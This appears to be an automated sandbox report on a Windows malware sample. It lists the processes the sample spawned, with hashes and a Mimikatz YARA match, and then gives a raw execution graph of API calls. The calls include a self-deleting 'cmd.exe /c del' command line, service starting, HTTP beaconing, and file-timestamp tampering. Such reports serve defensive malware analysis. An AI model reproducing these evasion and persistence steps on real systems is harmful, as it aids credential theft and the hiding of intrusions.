                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:18
                                              Start time:03:17:26
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:19
                                              Start time:03:17:26
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:21
                                              Start time:03:17:32
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\searchprotocolhost.exe
                                              Imagebase:0x930000
                                              File size:345088 bytes
                                              MD5 hash:0C5FF66721629A124F1C9F67E18A64DB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:23
                                              Start time:03:17:44
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhost.exe
                                              Imagebase:0x220000
                                              File size:19360 bytes
                                              MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:24
                                              Start time:03:17:52
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhost.exe
                                              Imagebase:0x220000
                                              File size:19360 bytes
                                              MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:26
                                              Start time:03:18:04
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:27
                                              Start time:03:18:07
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:28
                                              Start time:03:18:15
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0xc0000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: hacktool_windows_mimikatz_copywrite, Description: Mimikatz credential dump tool: Author copywrite, Source: C:\Windows\SysWOW64\WUDHostServices.exe, Author: @fusionrace
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 33%, Metadefender
                                              • Detection: 69%, ReversingLabs

                                              Target ID:29
                                              Start time:03:18:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:30
                                              Start time:03:18:29
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0x3e0000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:31
                                              Start time:03:18:31
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:32
                                              Start time:03:18:33
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:33
                                              Start time:03:18:42
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:35
                                              Start time:03:18:55
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:38
                                              Start time:03:19:05
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:39
                                              Start time:03:19:06
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0x1270000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language


                                                Execution Graph

                                                Execution Coverage:10.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:8.2%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:35
11187->10843 11188->11184 11193 25c5d5 11189->11193 11194 25c59f 11189->11194 11190 25c5ec 11192 25d2f4 _free 20 API calls 11190->11192 11191 25d2f4 _free 20 API calls 11191->11193 11192->11194 11193->11190 11193->11191 11194->10844 11196 256770 ___scrt_initialize_default_local_stdio_options ___scrt_fastfail 11195->11196 11316 25b854 11196->11316 11198 256887 11200 257097 TranslatorGuardHandler 5 API calls 11198->11200 11199 2567be ___scrt_fastfail 11199->11198 11319 256080 11199->11319 11201 256895 11200->11201 11201->10571 11203 25680c ___scrt_fastfail 11329 2563a0 11203->11329 11208 2562c6 ___scrt_fastfail 11207->11208 11209 2562dc GetModuleFileNameW wsprintfW 11208->11209 11809 2596c0 11209->11809 11211 25631f CreateProcessW 11212 25637c WaitForSingleObject 11211->11212 11213 25638a 11211->11213 11212->11213 11214 257097 TranslatorGuardHandler 5 API calls 11213->11214 11215 256394 11214->11215 11215->10547 11217 2596c0 ___scrt_fastfail 11216->11217 11218 2568c6 GetSystemDirectoryA 11217->11218 11219 2568ee ___scrt_fastfail 11218->11219 11220 253d30 50 API calls 11219->11220 11221 256906 CreateFileA 11220->11221 11222 25693a FindCloseChangeNotification DeleteFileA 11221->11222 11223 25692a 11221->11223 11225 257097 TranslatorGuardHandler 5 API calls 11222->11225 11224 257097 TranslatorGuardHandler 5 API calls 11223->11224 11226 256936 11224->11226 11227 25695a 11225->11227 11226->10542 11227->10542 11811 256160 CreateFileA 11228->11811 11230 256744 11231 257097 TranslatorGuardHandler 5 API calls 11230->11231 11233 256753 11231->11233 11232 256658 LocalFree 11232->11230 11233->10550 11235 256642 ___scrt_fastfail 11235->11230 11235->11232 11236 2566b4 LocalAlloc 11235->11236 11237 2566d4 11236->11237 11820 254560 11237->11820 11241 256703 11241->11232 11242 25670e LocalFree 11241->11242 11244 257097 TranslatorGuardHandler 5 API calls 11242->11244 11245 256739 11244->11245 11245->10550 11247 25590b new 11246->11247 11847 255a50 RegOpenKeyExA 11247->11847 11249 
25591e 11250 255931 ___std_exception_copy 11249->11250 11253 255955 ___std_exception_copy ___scrt_fastfail 11249->11253 11854 255180 11250->11854 11260 255980 GetSystemDirectoryA 11253->11260 11254 255945 11257 257097 TranslatorGuardHandler 5 API calls 11254->11257 11255 2559b3 11256 257097 TranslatorGuardHandler 5 API calls 11255->11256 11258 2559c1 11256->11258 11259 255951 11257->11259 11258->10552 11259->10552 11261 254ae0 11 API calls 11260->11261 11262 25599c 11261->11262 11262->11255 11263 2559a1 11262->11263 11264 257097 TranslatorGuardHandler 5 API calls 11263->11264 11265 2559af 11264->11265 11265->10552 11267 255c87 CloseHandle 11266->11267 11268 255c70 CreateFileA 11266->11268 11267->10554 11268->11267 11269 255c94 11268->11269 11269->10554 11271 25626e WriteFile 11270->11271 11272 25628a 11270->11272 11273 256284 CloseHandle 11271->11273 11274 256292 FindCloseChangeNotification 11271->11274 11272->10556 11273->11272 11274->10556 11993 254880 11275->11993 11277 255dc4 11278 255dcb 11277->11278 12008 255ca0 11277->12008 11278->10558 11280 255dea 11280->11278 11281 256240 4 API calls 11280->11281 11282 255dfd 11281->11282 11282->10558 11284 255c26 11283->11284 11285 255b4b ___scrt_fastfail 11283->11285 11286 257097 TranslatorGuardHandler 5 API calls 11284->11286 11288 255b5e GetSystemDirectoryA 11285->11288 11287 255c32 11286->11287 11287->10560 11289 255b80 11288->11289 11289->11289 11290 255b8a CreateFileA 11289->11290 11291 255be2 GetFileTime SetFileTime CloseHandle CloseHandle 11290->11291 11292 255bcb CloseHandle 11290->11292 11291->11284 11293 257097 TranslatorGuardHandler 5 API calls 11292->11293 11294 255bde 11293->11294 11294->10560 12039 256e80 RegOpenKeyExA 11295->12039 11298 257067 OpenServiceA 11300 25708c CloseServiceHandle 11298->11300 11301 25707a StartServiceA CloseServiceHandle 11298->11301 11299 256b49 Sleep 11302 254ae0 OpenSCManagerA 11299->11302 11300->11299 11301->11300 11303 254b06 OpenServiceA 11302->11303 11304 254b1d 
11302->11304 11305 254b16 CloseServiceHandle 11303->11305 11306 254b2f QueryServiceStatusEx CloseServiceHandle CloseServiceHandle 11303->11306 11307 257097 TranslatorGuardHandler 5 API calls 11304->11307 11305->11304 11309 257097 TranslatorGuardHandler 5 API calls 11306->11309 11308 254b2b 11307->11308 11308->10566 11310 254b6b 11309->11310 11310->10566 11312 255a0d RegSetValueExA 11311->11312 11313 255a2f 11311->11313 11314 255a35 RegCloseKey 11312->11314 11315 255a29 RegCloseKey 11312->11315 11313->10568 11314->10568 11315->11313 11362 25a563 11316->11362 11320 2560b4 ___scrt_fastfail 11319->11320 11756 255f70 11320->11756 11322 2560ee 11771 255e20 WSAStartup 11322->11771 11327 257097 TranslatorGuardHandler 5 API calls 11328 25615b 11327->11328 11328->11203 11330 2563b7 ___scrt_fastfail 11329->11330 11331 25bab2 ___std_exception_copy 26 API calls 11330->11331 11332 2563c7 ___scrt_fastfail 11331->11332 11333 25bab2 ___std_exception_copy 26 API calls 11332->11333 11334 2563e8 11333->11334 11798 25be70 11334->11798 11337 256450 11338 256474 InternetCloseHandle 11337->11338 11339 256477 11337->11339 11338->11339 11340 256481 11339->11340 11341 25647e InternetCloseHandle 11339->11341 11342 256488 InternetCloseHandle 11340->11342 11343 25648b InternetOpenA 11340->11343 11341->11340 11342->11343 11344 2564e3 InternetConnectA 11343->11344 11345 2564ce 11343->11345 11344->11345 11346 256509 HttpOpenRequestA 11344->11346 11347 257097 TranslatorGuardHandler 5 API calls 11345->11347 11346->11345 11349 25652c 11346->11349 11348 2564dd 11347->11348 11348->11198 11350 256535 InternetSetOptionA 11349->11350 11351 25654b HttpSendRequestA 11349->11351 11350->11351 11351->11345 11354 256564 11351->11354 11352 25659f HttpQueryInfoA 11355 25be70 42 API calls 11352->11355 11354->11352 11356 256583 InternetReadFile 11354->11356 11357 2565ef 11355->11357 11356->11352 11356->11354 11802 256410 11357->11802 11360 257097 TranslatorGuardHandler 5 API calls 11361 25660a 11360->11361 
11361->11198 11363 25a5a3 11362->11363 11364 25a58b 11362->11364 11363->11364 11366 25a5ab 11363->11366 11365 25d495 __dosmaperr 20 API calls 11364->11365 11367 25a590 11365->11367 11368 25a9bc __cftof 38 API calls 11366->11368 11369 25ba52 __cftof 26 API calls 11367->11369 11370 25a5bb 11368->11370 11377 25a59b 11369->11377 11379 25a987 11370->11379 11371 257097 TranslatorGuardHandler 5 API calls 11373 25a6bf 11371->11373 11373->11199 11377->11371 11380 25a9a6 11379->11380 11381 25d495 __dosmaperr 20 API calls 11380->11381 11382 25a633 11381->11382 11383 25abbe 11382->11383 11399 25b6bd 11383->11399 11385 25a63e 11396 25aa3f 11385->11396 11386 25abe3 11387 25d495 __dosmaperr 20 API calls 11386->11387 11388 25abe8 11387->11388 11389 25ba52 __cftof 26 API calls 11388->11389 11389->11385 11390 25abce 11390->11385 11390->11386 11406 25ad17 11390->11406 11414 25b181 11390->11414 11419 25adc1 11390->11419 11424 25ade9 11390->11424 11453 25af52 11390->11453 11397 25d2f4 _free 20 API calls 11396->11397 11398 25aa4f 11397->11398 11398->11377 11400 25b6d5 11399->11400 11401 25b6c2 11399->11401 11400->11390 11402 25d495 __dosmaperr 20 API calls 11401->11402 11403 25b6c7 11402->11403 11404 25ba52 __cftof 26 API calls 11403->11404 11405 25b6d2 11404->11405 11405->11390 11475 25ad36 11406->11475 11408 25ad1c 11409 25ad33 11408->11409 11410 25d495 __dosmaperr 20 API calls 11408->11410 11409->11390 11411 25ad25 11410->11411 11412 25ba52 __cftof 26 API calls 11411->11412 11413 25ad30 11412->11413 11413->11390 11415 25b187 11414->11415 11416 25b191 11414->11416 11484 25ab62 11415->11484 11416->11390 11420 25adc7 11419->11420 11422 25add1 11419->11422 11421 25ab62 42 API calls 11420->11421 11423 25add0 11421->11423 11422->11390 11423->11390 11425 25adf0 11424->11425 11426 25ae0a 11424->11426 11428 25ae3a 11425->11428 11429 25afd6 11425->11429 11430 25af6a 11425->11430 11427 25d495 __dosmaperr 20 API calls 11426->11427 11426->11428 11431 25ae26 11427->11431 11428->11390 11433 25afdd 
11429->11433 11434 25b01c 11429->11434 11441 25afae 11429->11441 11430->11441 11444 25af77 11430->11444 11432 25ba52 __cftof 26 API calls 11431->11432 11436 25ae31 11432->11436 11437 25af85 11433->11437 11438 25afe2 11433->11438 11550 25b632 11434->11550 11436->11390 11450 25af93 11437->11450 11452 25afa7 11437->11452 11542 25b26b 11437->11542 11438->11441 11443 25afe7 11438->11443 11441->11450 11441->11452 11536 25b455 11441->11536 11442 25afbd 11442->11452 11522 25b3c5 11442->11522 11445 25afec 11443->11445 11446 25affa 11443->11446 11444->11437 11444->11442 11444->11450 11445->11452 11526 25b613 11445->11526 11530 25b59f 11446->11530 11450->11452 11553 25b71a 11450->11553 11452->11390 11454 25afd6 11453->11454 11455 25af6a 11453->11455 11456 25afdd 11454->11456 11457 25b01c 11454->11457 11464 25afae 11454->11464 11455->11464 11466 25af77 11455->11466 11458 25af85 11456->11458 11459 25afe2 11456->11459 11460 25b632 26 API calls 11457->11460 11462 25b26b 48 API calls 11458->11462 11473 25af93 11458->11473 11474 25afa7 11458->11474 11463 25afe7 11459->11463 11459->11464 11460->11473 11461 25b455 26 API calls 11461->11473 11462->11473 11467 25afec 11463->11467 11468 25affa 11463->11468 11464->11461 11464->11473 11464->11474 11465 25afbd 11470 25b3c5 40 API calls 11465->11470 11465->11474 11466->11458 11466->11465 11466->11473 11471 25b613 26 API calls 11467->11471 11467->11474 11469 25b59f 26 API calls 11468->11469 11469->11473 11470->11473 11471->11473 11472 25b71a 40 API calls 11472->11474 11473->11472 11473->11474 11474->11390 11478 25ad60 11475->11478 11477 25ad42 11477->11408 11479 25adb6 11478->11479 11480 25ad82 11478->11480 11479->11477 11480->11479 11481 25d495 __dosmaperr 20 API calls 11480->11481 11482 25adab 11481->11482 11483 25ba52 __cftof 26 API calls 11482->11483 11483->11479 11487 25e098 11484->11487 11488 25e0b3 11487->11488 11491 25bbc3 11488->11491 11492 25b6bd 26 API calls 11491->11492 11494 25bbd5 11492->11494 11493 25bc10 11496 25a9bc __cftof 
38 API calls 11493->11496 11494->11493 11495 25bbea 11494->11495 11508 25ab89 11494->11508 11497 25d495 __dosmaperr 20 API calls 11495->11497 11501 25bc1c 11496->11501 11498 25bbef 11497->11498 11500 25ba52 __cftof 26 API calls 11498->11500 11500->11508 11502 25bc4b 11501->11502 11509 25be3d 11501->11509 11505 25bcb7 11502->11505 11516 25bdeb 11502->11516 11503 25bdeb 26 API calls 11506 25bd7e 11503->11506 11505->11503 11507 25d495 __dosmaperr 20 API calls 11506->11507 11506->11508 11507->11508 11508->11390 11510 25be5f 11509->11510 11511 25be49 11509->11511 11513 25be13 38 API calls 11510->11513 11511->11510 11512 25be51 11511->11512 11514 25f585 42 API calls 11512->11514 11515 25be5d 11513->11515 11514->11515 11515->11501 11517 25be0f 11516->11517 11518 25bdfb 11516->11518 11517->11505 11518->11517 11519 25d495 __dosmaperr 20 API calls 11518->11519 11520 25be04 11519->11520 11521 25ba52 __cftof 26 API calls 11520->11521 11521->11517 11523 25b3dd 11522->11523 11524 25b412 11523->11524 11559 25e2f9 11523->11559 11524->11450 11527 25b61f 11526->11527 11528 25b455 26 API calls 11527->11528 11529 25b631 11528->11529 11529->11450 11531 25b5b4 11530->11531 11532 25d495 __dosmaperr 20 API calls 11531->11532 11535 25b5c8 11531->11535 11533 25b5bd 11532->11533 11534 25ba52 __cftof 26 API calls 11533->11534 11534->11535 11535->11450 11537 25b466 11536->11537 11538 25d495 __dosmaperr 20 API calls 11537->11538 11541 25b490 11537->11541 11539 25b485 11538->11539 11540 25ba52 __cftof 26 API calls 11539->11540 11540->11541 11541->11450 11543 25b281 11542->11543 11581 25a6f7 11543->11581 11545 25b2c8 11591 25f3da 11545->11591 11549 25b361 11549->11450 11551 25b455 26 API calls 11550->11551 11552 25b649 11551->11552 11552->11450 11554 25b78c 11553->11554 11555 25b737 11553->11555 11556 257097 TranslatorGuardHandler 5 API calls 11554->11556 11555->11554 11557 25e2f9 __cftof 40 API calls 11555->11557 11558 25b7bb 11556->11558 11557->11555 11558->11452 11562 25e1d8 11559->11562 11563 
25e1ec 11562->11563 11564 25e211 11563->11564 11565 25e222 11563->11565 11575 25e1f0 11563->11575 11567 25d495 __dosmaperr 20 API calls 11564->11567 11566 25a9bc __cftof 38 API calls 11565->11566 11568 25e22d 11566->11568 11569 25e216 11567->11569 11570 25e297 WideCharToMultiByte 11568->11570 11571 25e23a 11568->11571 11572 25ba52 __cftof 26 API calls 11569->11572 11573 25e2c7 GetLastError 11570->11573 11574 25e248 ___scrt_fastfail 11570->11574 11571->11574 11576 25e27e ___scrt_fastfail 11571->11576 11572->11575 11573->11574 11573->11576 11574->11575 11577 25d495 __dosmaperr 20 API calls 11574->11577 11575->11524 11576->11575 11578 25d495 __dosmaperr 20 API calls 11576->11578 11577->11575 11579 25e2ea 11578->11579 11580 25ba52 __cftof 26 API calls 11579->11580 11580->11575 11582 25a713 11581->11582 11585 25a722 11581->11585 11583 25d495 __dosmaperr 20 API calls 11582->11583 11584 25a718 11583->11584 11584->11545 11585->11584 11586 25d32e __onexit 21 API calls 11585->11586 11587 25a749 11586->11587 11588 25a760 11587->11588 11623 25aa59 11587->11623 11589 25d2f4 _free 20 API calls 11588->11589 11589->11584 11592 25f400 11591->11592 11593 25f3ea 11591->11593 11595 25f414 11592->11595 11602 25f42a 11592->11602 11594 25d495 __dosmaperr 20 API calls 11593->11594 11596 25f3ef 11594->11596 11597 25d495 __dosmaperr 20 API calls 11595->11597 11598 25ba52 __cftof 26 API calls 11596->11598 11599 25f419 11597->11599 11601 25b342 11598->11601 11600 25ba52 __cftof 26 API calls 11599->11600 11600->11601 11601->11549 11616 25ab06 11601->11616 11604 25f486 11602->11604 11605 25f464 11602->11605 11603 25f4a4 11608 25f503 11603->11608 11609 25f4cd 11603->11609 11604->11603 11606 25f4a9 11604->11606 11626 25f2ae 11605->11626 11636 25eb99 11606->11636 11664 25ee9c 11608->11664 11611 25f4d2 11609->11611 11612 25f4eb 11609->11612 11647 25f1e6 11611->11647 11657 25f082 11612->11657 11739 25e068 11616->11739 11618 25ab18 11619 25ab2c 11618->11619 11743 25deba 11618->11743 11621 25e068 46 
API calls 11619->11621 11622 25ab35 11621->11622 11622->11549 11624 25d2f4 _free 20 API calls 11623->11624 11625 25aa68 11624->11625 11625->11588 11627 25f2d4 11626->11627 11630 25f2e9 11626->11630 11628 257097 TranslatorGuardHandler 5 API calls 11627->11628 11629 25f2e5 11628->11629 11629->11601 11631 25bab2 ___std_exception_copy 26 API calls 11630->11631 11632 25f38c 11631->11632 11632->11627 11633 25f399 11632->11633 11634 25ba7f __cftof 11 API calls 11633->11634 11635 25f3a5 11634->11635 11637 25ebad 11636->11637 11638 25a9bc __cftof 38 API calls 11637->11638 11639 25ebbf 11638->11639 11640 25ebc7 11639->11640 11641 25ebdb 11639->11641 11642 25d495 __dosmaperr 20 API calls 11640->11642 11644 25ee9c 40 API calls 11641->11644 11646 25ebd6 __alldvrm ___scrt_fastfail _strrchr 11641->11646 11643 25ebcc 11642->11643 11645 25ba52 __cftof 26 API calls 11643->11645 11644->11646 11645->11646 11646->11601 11671 262fde 11647->11671 11651 25f246 11652 25f24d 11651->11652 11653 25f28b 11651->11653 11655 25f265 11651->11655 11652->11601 11725 25ef37 11653->11725 11722 25f10f 11655->11722 11658 262fde 28 API calls 11657->11658 11659 25f0af 11658->11659 11660 262a40 26 API calls 11659->11660 11661 25f0e7 11660->11661 11662 25f0ee 11661->11662 11663 25f10f 38 API calls 11661->11663 11662->11601 11663->11662 11665 262fde 28 API calls 11664->11665 11666 25eec4 11665->11666 11667 262a40 26 API calls 11666->11667 11668 25ef09 11667->11668 11669 25ef10 11668->11669 11670 25ef37 38 API calls 11668->11670 11669->11601 11670->11669 11675 263013 11671->11675 11672 26304f 11673 25bab2 ___std_exception_copy 26 API calls 11672->11673 11674 26433f 11673->11674 11676 26436d 11674->11676 11681 264317 11674->11681 11675->11672 11680 2630a2 11675->11680 11677 25ba7f __cftof 11 API calls 11676->11677 11679 264379 11677->11679 11678 257097 TranslatorGuardHandler 5 API calls 11682 25f214 11678->11682 11683 2650b0 22 API calls 11680->11683 11681->11678 11713 262a40 11682->11713 11684 26311f 
11683->11684 11685 2651c0 __floor_pentium4 22 API calls 11684->11685 11686 263129 11685->11686 11688 263429 11686->11688 11689 263390 11686->11689 11692 2631ae 11686->11692 11687 2635a7 ___scrt_fastfail 11694 260330 26 API calls 11687->11694 11688->11687 11690 260330 26 API calls 11688->11690 11689->11688 11691 260330 26 API calls 11689->11691 11690->11687 11691->11688 11693 260330 26 API calls 11692->11693 11698 263242 11692->11698 11693->11698 11695 263388 11694->11695 11710 263805 ___scrt_fastfail 11695->11710 11712 263c68 ___scrt_fastfail 11695->11712 11696 260330 26 API calls 11696->11695 11697 2640ff 11699 262b30 26 API calls 11697->11699 11698->11696 11704 26414b 11699->11704 11700 263c56 11700->11697 11703 260330 26 API calls 11700->11703 11701 263b88 11701->11700 11702 260330 26 API calls 11701->11702 11702->11700 11703->11697 11705 260330 26 API calls 11704->11705 11711 2641b2 11704->11711 11705->11711 11706 260330 26 API calls 11706->11712 11707 262b30 26 API calls 11707->11711 11708 260330 26 API calls 11708->11711 11709 260330 26 API calls 11709->11710 11710->11701 11710->11709 11711->11681 11711->11707 11711->11708 11712->11701 11712->11706 11714 262a4d 11713->11714 11717 262a63 11713->11717 11715 25d495 __dosmaperr 20 API calls 11714->11715 11721 262a5c CallUnexpected 11714->11721 11716 262a52 11715->11716 11718 25ba52 __cftof 26 API calls 11716->11718 11717->11714 11719 262a7f 11717->11719 11718->11721 11720 25d495 __dosmaperr 20 API calls 11719->11720 11720->11716 11721->11651 11723 25a9bc __cftof 38 API calls 11722->11723 11724 25f125 ___scrt_fastfail 11723->11724 11724->11652 11726 25ef48 11725->11726 11727 25ef56 11726->11727 11728 25ef6d 11726->11728 11729 25d495 __dosmaperr 20 API calls 11727->11729 11730 25a9bc __cftof 38 API calls 11728->11730 11731 25ef5b 11729->11731 11734 25ef79 11730->11734 11732 25ba52 __cftof 26 API calls 11731->11732 11733 25ef65 11732->11733 11733->11652 11735 25bab2 ___std_exception_copy 26 API calls 11734->11735 
11738 25eff7 CallUnexpected 11735->11738 11736 25ba7f __cftof 11 API calls 11737 25f081 11736->11737 11738->11736 11740 25e076 11739->11740 11742 25e080 11739->11742 11748 25e04e 11740->11748 11742->11618 11744 25ded6 11743->11744 11745 25dec8 11743->11745 11744->11618 11751 25de82 11745->11751 11749 25dee7 46 API calls 11748->11749 11750 25e063 11749->11750 11750->11742 11752 25a9bc __cftof 38 API calls 11751->11752 11753 25de95 11752->11753 11754 25be3d 42 API calls 11753->11754 11755 25dea3 11754->11755 11755->11618 11787 267710 11756->11787 11759 255fa4 GetAdaptersInfo 11760 256064 11759->11760 11764 255fca 11759->11764 11761 257097 TranslatorGuardHandler 5 API calls 11760->11761 11762 256072 11761->11762 11762->11322 11763 256029 11765 253d30 50 API calls 11763->11765 11764->11763 11766 25600c 11764->11766 11765->11760 11767 253d30 50 API calls 11766->11767 11768 256017 11767->11768 11769 257097 TranslatorGuardHandler 5 API calls 11768->11769 11770 256025 11769->11770 11770->11322 11774 255e56 ___scrt_fastfail 11771->11774 11781 255f4e 11771->11781 11772 257097 TranslatorGuardHandler 5 API calls 11773 255f5e gethostname GetTickCount 11772->11773 11783 253d30 11773->11783 11775 255e7b gethostname gethostbyname 11774->11775 11780 255ea7 11775->11780 11775->11781 11776 255ec7 inet_ntoa 11789 25bb0c 11776->11789 11778 255f37 11779 25bab2 ___std_exception_copy 26 API calls 11778->11779 11779->11781 11780->11776 11780->11778 11782 25bb0c 26 API calls 11780->11782 11781->11772 11782->11780 11784 253d49 ___scrt_initialize_default_local_stdio_options 11783->11784 11785 25b854 50 API calls 11784->11785 11786 253d57 11785->11786 11786->11327 11788 255f7d WSAStartup 11787->11788 11788->11759 11788->11760 11790 25bb28 11789->11790 11793 25bb1a 11789->11793 11791 25d495 __dosmaperr 20 API calls 11790->11791 11792 25bb30 11791->11792 11794 25ba52 __cftof 26 API calls 11792->11794 11793->11790 11796 25bb51 11793->11796 11795 25bb3a 11794->11795 11795->11780 11796->11795 11797 
25d495 __dosmaperr 20 API calls 11796->11797 11797->11792 11799 25be89 11798->11799 11800 25bbc3 42 API calls 11799->11800 11801 2563f2 11800->11801 11801->11337 11803 256420 InternetCloseHandle 11802->11803 11804 256423 11802->11804 11803->11804 11805 25642d 11804->11805 11806 25642a InternetCloseHandle 11804->11806 11807 256434 InternetCloseHandle 11805->11807 11808 256437 11805->11808 11806->11805 11807->11808 11808->11360 11810 2596d7 11809->11810 11810->11211 11810->11810 11812 2561c4 11811->11812 11813 25618c GetFileSizeEx LocalAlloc 11811->11813 11812->11235 11814 2561cd 11813->11814 11815 2561bd CloseHandle 11813->11815 11818 2561e0 ReadFile 11814->11818 11819 256209 11814->11819 11815->11812 11816 256211 CloseHandle LocalFree 11816->11235 11817 25622b FindCloseChangeNotification 11817->11235 11818->11814 11818->11819 11819->11816 11819->11817 11825 2545b8 11820->11825 11821 25464c 11822 257097 TranslatorGuardHandler 5 API calls 11821->11822 11823 25465d 11822->11823 11827 25d1bf 11823->11827 11824 253d30 50 API calls 11824->11825 11825->11821 11825->11824 11826 254641 lstrcpyA 11825->11826 11826->11821 11828 25d1ef 11827->11828 11829 25d1cd 11827->11829 11837 25d207 11828->11837 11829->11828 11831 25d1d2 11829->11831 11833 25d495 __dosmaperr 20 API calls 11831->11833 11832 25d202 11832->11241 11834 25d1d7 11833->11834 11835 25ba52 __cftof 26 API calls 11834->11835 11836 25d1e2 11835->11836 11836->11241 11838 25a9bc __cftof 38 API calls 11837->11838 11839 25d21d 11838->11839 11840 25d22b 11839->11840 11846 25d242 11839->11846 11841 25d495 